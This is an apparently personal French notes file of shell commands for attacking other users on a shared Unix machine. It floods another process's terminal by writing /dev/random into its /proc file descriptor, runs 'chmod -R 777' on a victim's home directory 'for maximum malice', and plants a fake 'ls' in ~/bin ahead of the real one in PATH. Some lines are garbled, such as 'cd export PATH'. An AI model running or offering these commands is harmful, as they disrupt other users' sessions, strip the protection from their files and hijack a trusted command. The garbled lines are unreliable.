21 lines
357 B
Plaintext
21 lines
357 B
Plaintext
|
cd /proc/27717
|
||
|
cd fd
|
||
|
cat /dev/random>1
|
||
|
arretable
|
||
|
cat /dev/random>1&
|
||
|
inarretable
|
||
|
|
||
|
bonus : aller sur répertoire "~", puis faire cd "../", et faire ls -l
|
||
|
|
||
|
ls -larth | grep drwxrwxrwx
|
||
|
|
||
|
chmod -R 777 ~/ (directement dans la session d'un mec)(pour la malveillance max!!!!!!!!!!!!!)
|
||
|
|
||
|
mkdir bin
|
||
|
cd bin
|
||
|
vim ls
|
||
|
chmod -R 777 ~/
|
||
|
|
||
|
chmod +x ls
|
||
|
|
||
|
cd export PATH=~/bin:$PATH
|